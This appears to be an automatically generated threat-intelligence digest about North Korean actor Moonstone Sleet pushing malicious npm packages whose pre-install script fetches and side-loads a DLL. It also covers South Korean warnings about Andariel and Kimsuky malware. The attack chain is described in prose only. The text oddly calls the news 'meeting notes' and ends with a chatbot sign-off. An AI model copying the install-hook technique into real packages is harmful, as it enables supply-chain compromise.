August 6, 2024 at 08:06AM
North Korean threat actor Moonstone Sleet is distributing malicious npm packages to infect Windows systems. Security researchers are tracking the threat actor, which is linked to a newly discovered North Korean malicious activity cluster. The actor’s attack chains involve bogus ZIP archives and fake technical skills assessments to deliver malicious payloads. South Korea’s NCSC warned of cyber attacks by North Korean threat groups.
Based on the meeting notes provided, the key takeaways are as follows:
– The threat actor known as Moonstone Sleet has been pushing malicious npm packages to the JavaScript package registry in an attempt to infect Windows systems.
– The packages in question, harthat-api and harthat-hash, were published on July 7, 2024, but were quickly pulled after a short period of time and did not attract any downloads.
– The security arm of a cloud monitoring firm is tracking the threat actor under the name Stressed Pungsan, which exhibits overlaps with a newly discovered North Korean malicious activity cluster dubbed Moonstone Sleet.
– The malicious package reuses code from a well-known GitHub repository called node-config and has been used to disseminate bogus ZIP archive files via LinkedIn and freelancing websites to entice prospective targets into executing payloads.
– Moonstone Sleet has also been attempting to spread their packages through the npm registry, which are designed to run a pre-install script specified in the package.json file and contact an external server to download a DLL file that’s side loading using the rundll32.exe binary. The rogue DLL, for its part, does not perform any malicious actions, suggesting either a trial run of its payload delivery infrastructure or that it was inadvertently pushed to the registry before embedding malicious code into it.
– South Korea’s National Cyber Security Center (NCSC) has warned of cyber attacks mounted by North Korean threat groups tracked as Andariel and Kimsuky to deliver malware families such as Dora RAT and TrollAgent (aka Troll Stealer) as part of intrusion campaigns aimed at construction and machinery sectors in the country.
Please let me know if there is anything else you would like me to look into or if there are any specific action items to be addressed.